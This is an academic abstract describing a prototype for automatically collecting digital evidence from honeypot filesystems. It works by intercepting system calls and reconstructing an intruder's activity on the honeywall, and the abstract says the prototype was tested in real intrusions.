A mechanism for automatic digital evidence collection on high-interaction honeypots

Honeypots are computational resources whose value resides in being probed, attacked or compromised by invaders. This makes it possible to obtain information about their methods, tools and motivations. On high-interaction honeypots this is done, among other ways, by collecting digital evidence. This collection is traditionally done manually and statically, demanding time and not always generating good results. In this paper, we describe an automatic, dynamic and transparent mechanism for collecting digital evidence from the filesystem of honeypots, eliminating the flaws found in the traditional methods. The mechanism consists of two modules: an interceptor module, that intercepts some preselected system calls on the honeypot and transmits the argument data to the honeynet; and a receiver module, that captures the transmitted data and reconstructs on the honey wall the evidence produced by an intruder during an invasion. A prototype based on the mechanism was implemented and tested in real intrusion situations. The mechanism´s behavior in one of these situations is also described, followed by an analysis of the results.